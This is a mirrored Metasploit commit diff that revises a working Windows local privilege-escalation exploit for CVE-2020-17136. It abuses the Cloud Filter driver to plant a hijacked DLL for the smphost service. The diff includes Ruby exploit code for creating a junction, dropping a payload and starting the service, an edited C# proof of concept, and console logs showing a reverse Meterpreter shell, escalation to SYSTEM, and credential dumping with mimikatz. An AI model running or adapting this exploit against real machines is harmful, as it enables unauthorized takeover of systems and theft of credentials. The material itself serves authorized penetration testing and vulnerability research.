mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Make second round of review edits to fix Spencer's comments
This commit is contained in:
parent
d5bb36c530
commit
3072391d00
Binary file not shown.
@ -7,21 +7,23 @@ security checks that would otherwise prevent a normal user from being able to cr
|
|||||||
they don't have permissions to create files in.
|
they don't have permissions to create files in.
|
||||||
|
|
||||||
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
|
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
|
||||||
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. The module
|
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are
|
||||||
then uses RPCSS named pipe impersonation to obtain a `SYSTEM` token and assign it to the current process,
|
strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will
|
||||||
thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user.
|
allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using
|
||||||
|
Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate
|
||||||
|
the `SYSTEM` user.
|
||||||
|
|
||||||
### Installation And Setup
|
### Installation And Setup
|
||||||
`cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.
|
`cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
1. Start msfconsole
|
1. Start msfconsole
|
||||||
2. Get a meterpreter shell as a low privileged user.
|
2. Get a shell as a low privileged user.
|
||||||
3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
|
3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
|
||||||
4. `use exploit/windows/local/cve_2020_17136`
|
4. `use exploit/windows/local/cve_2020_17136`
|
||||||
5. `set session *session id*`
|
5. `set session *session id*`
|
||||||
6. `run`
|
6. `run`
|
||||||
7. **Verify** that you get a new shell as the `SYSTEM` user
|
7. **Verify** that you get a new shell as the `N` user
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
@ -43,7 +45,7 @@ msf6 exploit(multi/handler) > run
|
|||||||
|
|
||||||
[*] Started bind TCP handler against 172.22.152.177:4444
|
[*] Started bind TCP handler against 172.22.152.177:4444
|
||||||
[*] Sending stage (200262 bytes) to 172.22.152.177
|
[*] Sending stage (200262 bytes) to 172.22.152.177
|
||||||
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-06 01:26:51 -0600
|
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600
|
||||||
|
|
||||||
meterpreter > getuid
|
meterpreter > getuid
|
||||||
Server username: DESKTOP-KUO5CML\normal
|
Server username: DESKTOP-KUO5CML\normal
|
||||||
@ -60,14 +62,6 @@ SeShutdownPrivilege
|
|||||||
SeTimeZonePrivilege
|
SeTimeZonePrivilege
|
||||||
SeUndockPrivilege
|
SeUndockPrivilege
|
||||||
|
|
||||||
meterpreter > sysinfo
|
|
||||||
Computer : DESKTOP-KUO5CML
|
|
||||||
OS : Windows 10 (10.0 Build 19041).
|
|
||||||
Architecture : x64
|
|
||||||
System Language : en_US
|
|
||||||
Domain : WORKGROUP
|
|
||||||
Logged On Users : 5
|
|
||||||
Meterpreter : x64/windows
|
|
||||||
meterpreter > getsystem
|
meterpreter > getsystem
|
||||||
[-] 2001: Operation failed: Access is denied. The following was attempted:
|
[-] 2001: Operation failed: Access is denied. The following was attempted:
|
||||||
[-] Named Pipe Impersonation (In Memory/Admin)
|
[-] Named Pipe Impersonation (In Memory/Admin)
|
||||||
@ -78,16 +72,20 @@ meterpreter > background
|
|||||||
[*] Backgrounding session 1...
|
[*] Backgrounding session 1...
|
||||||
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
|
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
|
||||||
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
|
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
|
||||||
|
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
|
||||||
|
SESSION => 1
|
||||||
|
msf6 exploit(windows/local/cve_2020_17136) > check
|
||||||
|
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > show options
|
msf6 exploit(windows/local/cve_2020_17136) > show options
|
||||||
|
|
||||||
Module options (exploit/windows/local/cve_2020_17136):
|
Module options (exploit/windows/local/cve_2020_17136):
|
||||||
|
|
||||||
Name Current Setting Required Description
|
Name Current Setting Required Description
|
||||||
---- --------------- -------- -----------
|
---- --------------- -------- -----------
|
||||||
AMSIBYPASS true yes Enable Amsi bypass
|
AMSIBYPASS true yes Enable Amsi bypass
|
||||||
ETWBYPASS true yes Enable Etw bypass
|
ETWBYPASS true yes Enable Etw bypass
|
||||||
SESSION yes The session to run this module on.
|
SESSION 1 yes The session to run this module on.
|
||||||
WAIT 5 no Time in seconds to wait
|
WAIT 5 no Time in seconds to wait
|
||||||
|
|
||||||
|
|
||||||
Payload options (windows/x64/meterpreter/reverse_tcp):
|
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||||
@ -106,36 +104,52 @@ Exploit target:
|
|||||||
0 Windows DLL Dropper
|
0 Windows DLL Dropper
|
||||||
|
|
||||||
|
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
|
|
||||||
SESSION => 1
|
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
|
msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
|
||||||
LHOST => 172.22.159.28
|
LHOST => 172.22.159.28
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > set LPORT 6688
|
|
||||||
LPORT => 6688
|
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > run
|
msf6 exploit(windows/local/cve_2020_17136) > run
|
||||||
|
|
||||||
[*] Started reverse TCP handler on 172.22.159.28:6688
|
[*] Started reverse TCP handler on 172.22.159.28:4444
|
||||||
[*] Executing automatic check (disable AutoCheck to override)
|
[*] Executing automatic check (disable AutoCheck to override)
|
||||||
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
|
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
|
||||||
[*] Dropping payload dll at C:\Windows\Temp\WsutUtXDcIsPqEKn.dll and registering it for cleanup...
|
[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
|
||||||
[*] Running module against DESKTOP-KUO5CML
|
[*] Running module against DESKTOP-KUO5CML
|
||||||
[*] Launching notepad.exe to host CLR...
|
[*] Launching notepad.exe to host CLR...
|
||||||
[+] Process 7784 launched.
|
[+] Process 100 launched.
|
||||||
[*] Reflectively injecting the Host DLL into 7784..
|
[*] Reflectively injecting the Host DLL into 100..
|
||||||
[*] Injecting Host into 7784...
|
[*] Injecting Host into 100...
|
||||||
[*] Host injected. Copy assembly into 7784...
|
[*] Host injected. Copy assembly into 100...
|
||||||
[*] Assembly copied.
|
[*] Assembly copied.
|
||||||
[*] Executing...
|
[*] Executing...
|
||||||
[*] Start reading output
|
[*] Start reading output
|
||||||
[+] Key: 1821285265184
|
[+] Sync connection key: 2733760425760
|
||||||
[+] Done
|
[+] Done
|
||||||
[*] End output.
|
[*] End output.
|
||||||
[+] Execution finished.
|
[+] Execution finished.
|
||||||
[*] Sending stage (200262 bytes) to 172.22.152.177
|
[*] Sending stage (200262 bytes) to 172.22.152.177
|
||||||
[*] Meterpreter session 2 opened (172.22.159.28:6688 -> 172.22.152.177:62867) at 2021-01-06 01:28:26 -0600
|
[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600
|
||||||
[*] Session ID 2 (172.22.159.28:6688 -> 172.22.152.177:62867) processing AutoRunScript 'post/windows/escalate/getsystem'
|
|
||||||
[+] Obtained SYSTEM via technique 4
|
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: NT AUTHORITY\NETWORK SERVICE
|
||||||
|
meterpreter > getprivs
|
||||||
|
|
||||||
|
Enabled Process Privileges
|
||||||
|
==========================
|
||||||
|
|
||||||
|
Name
|
||||||
|
----
|
||||||
|
SeAssignPrimaryTokenPrivilege
|
||||||
|
SeAuditPrivilege
|
||||||
|
SeChangeNotifyPrivilege
|
||||||
|
SeCreateGlobalPrivilege
|
||||||
|
SeImpersonatePrivilege
|
||||||
|
SeIncreaseQuotaPrivilege
|
||||||
|
SeIncreaseWorkingSetPrivilege
|
||||||
|
SeShutdownPrivilege
|
||||||
|
SeTimeZonePrivilege
|
||||||
|
SeUndockPrivilege
|
||||||
|
|
||||||
|
meterpreter > getsystem
|
||||||
|
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
|
||||||
meterpreter > getuid
|
meterpreter > getuid
|
||||||
Server username: NT AUTHORITY\SYSTEM
|
Server username: NT AUTHORITY\SYSTEM
|
||||||
meterpreter > getprivs
|
meterpreter > getprivs
|
||||||
@ -157,7 +171,7 @@ SeTimeZonePrivilege
|
|||||||
SeUndockPrivilege
|
SeUndockPrivilege
|
||||||
|
|
||||||
meterpreter > load kiwi
|
meterpreter > load kiwi
|
||||||
Loading extension kiwi...cre
|
Loading extension kiwi...
|
||||||
.#####. mimikatz 2.2.0 20191125 (x64/windows)
|
.#####. mimikatz 2.2.0 20191125 (x64/windows)
|
||||||
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
|
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
|
||||||
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
|
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
|
||||||
@ -198,8 +212,8 @@ normal DESKTOP-KUO5CML (null)
|
|||||||
test DESKTOP-KUO5CML (null)
|
test DESKTOP-KUO5CML (null)
|
||||||
|
|
||||||
|
|
||||||
meterpreter > background
|
meterpreter >
|
||||||
[*] Backgrounding session 2...
|
Background session 2? [y/N]
|
||||||
msf6 exploit(windows/local/cve_2020_17136) > sessions
|
msf6 exploit(windows/local/cve_2020_17136) > sessions
|
||||||
|
|
||||||
Active sessions
|
Active sessions
|
||||||
@ -208,7 +222,7 @@ Active sessions
|
|||||||
Id Name Type Information Connection
|
Id Name Type Information Connection
|
||||||
-- ---- ---- ----------- ----------
|
-- ---- ---- ----------- ----------
|
||||||
1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
|
1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
|
||||||
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:6688 -> 172.22.152.177:62867 (172.22.152.177)
|
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)
|
||||||
|
|
||||||
msf6 exploit(windows/local/cve_2020_17136) >
|
msf6 exploit(windows/local/cve_2020_17136) >
|
||||||
```
|
```
|
||||||
|
@ -590,7 +590,7 @@ namespace POC_CloudFilter_ArbitraryFile_EoP
|
|||||||
CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check();
|
CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check();
|
||||||
try
|
try
|
||||||
{
|
{
|
||||||
Console.WriteLine("Key: {0}", key);
|
Console.WriteLine("Sync connection key: {0}", key);
|
||||||
CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1];
|
CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1];
|
||||||
place_holders[0].RelativeFileName = FilePath;
|
place_holders[0].RelativeFileName = FilePath;
|
||||||
CF_FS_METADATA meta_data = new CF_FS_METADATA
|
CF_FS_METADATA meta_data = new CF_FS_METADATA
|
||||||
|
@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||||
include Msf::Post::Windows::Dotnet
|
include Msf::Post::Windows::Dotnet
|
||||||
include Msf::Post::Windows::Services
|
include Msf::Post::Windows::Services
|
||||||
|
include Msf::Post::Windows::FileSystem
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
prepend Msf::Exploit::Remote::AutoCheck
|
prepend Msf::Exploit::Remote::AutoCheck
|
||||||
|
|
||||||
@ -20,17 +21,20 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
info,
|
info,
|
||||||
'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
|
'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates,
|
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December
|
||||||
did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling
|
2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when
|
||||||
FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker
|
calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()
|
||||||
controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any
|
function with attacker controlled input. This meant that files were created with
|
||||||
security checks that would otherwise prevent a normal user from being able to create files in directories
|
KernelMode permissions, thereby bypassing any security checks that would otherwise
|
||||||
|
prevent a normal user from being able to create files in directories
|
||||||
they don't have permissions to create files in.
|
they don't have permissions to create files in.
|
||||||
|
|
||||||
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
|
This module abuses this vulnerability to perform a DLL hijacking attack against the
|
||||||
Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. The module
|
Microsoft Storage Spaces SMP service, which grants the attacker code execution as the
|
||||||
then uses RPCSS named pipe impersonation to obtain a SYSTEM token and assign it to the current process,
|
NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one
|
||||||
thereby allowing the attacker to execute arbitrary code as the SYSTEM user.
|
of the Meterpreter payloads, as doing so will allow them to subsequently escalate their
|
||||||
|
new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command
|
||||||
|
to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' => [
|
'Author' => [
|
||||||
@ -40,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
'Platform' => ['win'],
|
'Platform' => ['win'],
|
||||||
'SessionTypes' => ['meterpreter'],
|
'SessionTypes' => ['meterpreter'],
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Arch' => [ARCH_X86, ARCH_X64],
|
'Arch' => [ARCH_X64],
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
|
[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
|
||||||
@ -62,7 +66,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
{
|
{
|
||||||
'EXITFUNC' => 'process',
|
'EXITFUNC' => 'process',
|
||||||
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
|
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
|
||||||
'AUTORUNSCRIPT' => 'post/windows/escalate/getsystem'
|
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
@ -81,23 +84,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def find_required_clr(exe_path)
|
|
||||||
filecontent = File.read(exe_path).bytes
|
|
||||||
sign = 'v4.0.30319'.bytes
|
|
||||||
filecontent.each_with_index do |_item, index|
|
|
||||||
sign.each_with_index do |subitem, indexsub|
|
|
||||||
break if subitem.to_s(16) != filecontent[index + indexsub].to_s(16)
|
|
||||||
|
|
||||||
if indexsub == 9
|
|
||||||
vprint_status('CLR version required: v4.0.30319')
|
|
||||||
return 'v4.0.30319'
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
vprint_status('CLR version required: v2.0.50727')
|
|
||||||
'v2.0.50727'
|
|
||||||
end
|
|
||||||
|
|
||||||
def check_requirements(clr_req, installed_dotnet_versions)
|
def check_requirements(clr_req, installed_dotnet_versions)
|
||||||
installed_dotnet_versions.each do |fi|
|
installed_dotnet_versions.each do |fi|
|
||||||
if clr_req == 'v4.0.30319'
|
if clr_req == 'v4.0.30319'
|
||||||
@ -116,7 +102,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
|
|
||||||
def check
|
def check
|
||||||
sysinfo_value = sysinfo['OS']
|
sysinfo_value = sysinfo['OS']
|
||||||
|
|
||||||
if sysinfo_value !~ /windows/i
|
if sysinfo_value !~ /windows/i
|
||||||
# Non-Windows systems are definitely not affected.
|
# Non-Windows systems are definitely not affected.
|
||||||
return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
|
return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
|
||||||
@ -153,23 +138,29 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
def exploit
|
def exploit
|
||||||
if sysinfo['Architecture'] != 'x64'
|
if sysinfo['Architecture'] != 'x64'
|
||||||
fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
|
fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
|
||||||
|
elsif session.arch != 'x64'
|
||||||
|
fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')
|
||||||
end
|
end
|
||||||
dir_junct_path = 'C:\\Windows\\Temp'
|
dir_junct_path = 'C:\\Windows\\Temp'
|
||||||
intermediate_dir = rand_text_alpha(10).to_s
|
intermediate_dir = rand_text_alpha(10).to_s
|
||||||
junction_dir = rand_text_alpha(10).to_s
|
junction_dir = rand_text_alpha(10).to_s
|
||||||
|
path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"
|
||||||
|
|
||||||
cd(dir_junct_path)
|
mkdir("#{path_to_intermediate_dir}")
|
||||||
mkdir(intermediate_dir)
|
if !directory?("#{path_to_intermediate_dir}")
|
||||||
if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
|
|
||||||
fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
|
fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
|
||||||
end
|
end
|
||||||
register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}")
|
register_dir_for_cleanup("#{path_to_intermediate_dir}")
|
||||||
|
|
||||||
cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
|
mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
|
||||||
if !directory?("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
|
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
|
||||||
fail_with(Failure::UnexpectedReply, 'Could not create the junction directory!')
|
fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
|
||||||
|
end
|
||||||
|
|
||||||
|
mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
|
||||||
|
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
|
||||||
|
fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
|
||||||
end
|
end
|
||||||
register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
|
|
||||||
|
|
||||||
exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
|
exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
|
||||||
unless File.file?(exe_path)
|
unless File.file?(exe_path)
|
||||||
@ -180,17 +171,18 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
if installed_dotnet_versions == []
|
if installed_dotnet_versions == []
|
||||||
fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
|
fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
|
||||||
end
|
end
|
||||||
rclr = find_required_clr(exe_path)
|
if check_requirements('v4.0.30319', installed_dotnet_versions) == false
|
||||||
if check_requirements(rclr, installed_dotnet_versions) == false
|
|
||||||
fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
|
fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
|
||||||
end
|
end
|
||||||
payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
|
payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
|
||||||
print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
|
print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
|
||||||
write_file(payload_path, generate_payload_dll)
|
write_file(payload_path, generate_payload_dll)
|
||||||
register_file_for_cleanup(payload_path)
|
register_file_for_cleanup(payload_path)
|
||||||
execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
|
execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
|
||||||
service_start('smphost')
|
service_start('smphost')
|
||||||
register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
|
register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
|
||||||
|
sleep(3)
|
||||||
|
delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)
|
||||||
end
|
end
|
||||||
|
|
||||||
def pid_exists(pid)
|
def pid_exists(pid)
|
||||||
|
Loading…
Reference in New Issue
Block a user